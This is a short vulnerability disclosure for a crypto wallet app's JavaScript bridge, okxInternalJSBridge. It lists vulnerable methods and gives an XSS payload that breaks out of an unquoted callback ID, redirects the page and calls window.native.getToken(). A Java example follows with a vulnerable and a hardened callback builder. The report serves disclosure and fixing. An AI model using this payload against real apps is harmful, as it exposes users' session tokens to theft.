Vulnerability Details
Interface: _aptos_ (okxInternalJSBridge)
Vulnerable File: sources/p270o/cFK.java
Vulnerable Lines: 33, 61, 65
Vulnerable Methods: requestAccounts, disconnect, connectWallets
Vulnerable Pattern: UNQUOTED ID injection
XSS Payload
Payload: 1);setTimeout(()=>{window.location='https://www.okx.com'},500);setTimeout(()=>{alert(window.native.getToken())},1000);//
Explanation: Redirects to www.okx.com after 500 ms, then executes alert(window.native.getToken()) after 1000 ms.
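
The unquoted-ID pattern named above, shown as an added example (not code from cFK.java or from this report): a hypothetical Java callback builder that concatenates the request id into the script as bare JavaScript, beside a hardened form that emits the id only as a number literal or an escaped string literal. The callback name, method names and sample id are assumptions, and the result argument is assumed to be JSON produced by the native side.

```java
import java.util.regex.Pattern;

public class BridgeCallback {
    // Assumed callback name; the bridge's real JavaScript entry point is not shown in the report.
    static final String CALLBACK = "window.__bridgeCallback";
    // Decimal integer without leading zeros, short enough to stay exact as a JS number.
    static final Pattern NUMERIC_ID = Pattern.compile("0|[1-9][0-9]{0,15}");

    // Assumed shape of the vulnerable pattern: the page-supplied id is pasted
    // into the script unquoted, so its text is parsed as JavaScript source.
    static String buildUnquoted(String id, String jsonResult) {
        return CALLBACK + "(" + id + "," + jsonResult + ")";
    }

    // Hardened form: a numeric id is emitted as a number literal; anything
    // else is emitted as an escaped string literal and stays data.
    static String buildSafe(String id, String jsonResult) {
        String arg = NUMERIC_ID.matcher(id).matches() ? id : quoteJs(id);
        return CALLBACK + "(" + arg + "," + jsonResult + ")";
    }

    // Allow-list escaper: characters outside a small safe set become 4-digit
    // hex escapes, so quotes, parentheses, slashes and newlines cannot end the literal.
    static String quoteJs(String s) {
        StringBuilder sb = new StringBuilder("\"");
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            boolean safe = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z')
                    || (c >= '0' && c <= '9') || c == '_' || c == '-' || c == '.' || c == ' ';
            if (safe) { sb.append(c); }
            else { sb.append(String.format("\\u%04x", (int) c)); }
        }
        return sb.append('"').toString();
    }

    public static void main(String[] args) {
        String id = "1);probe();//";       // constructed sample id, not taken from the report
        String result = "{\"ok\":true}";   // constructed native-side result
        System.out.println(buildUnquoted(id, result)); // id text becomes part of the script
        System.out.println(buildSafe(id, result));     // id stays inside one string literal
        System.out.println(buildSafe("42", result));   // well-formed id passes as a number
    }
}
```

The same check belongs in every bridge method that echoes a page-supplied id back into the WebView, which in this report means requestAccounts, disconnect and connectWallets.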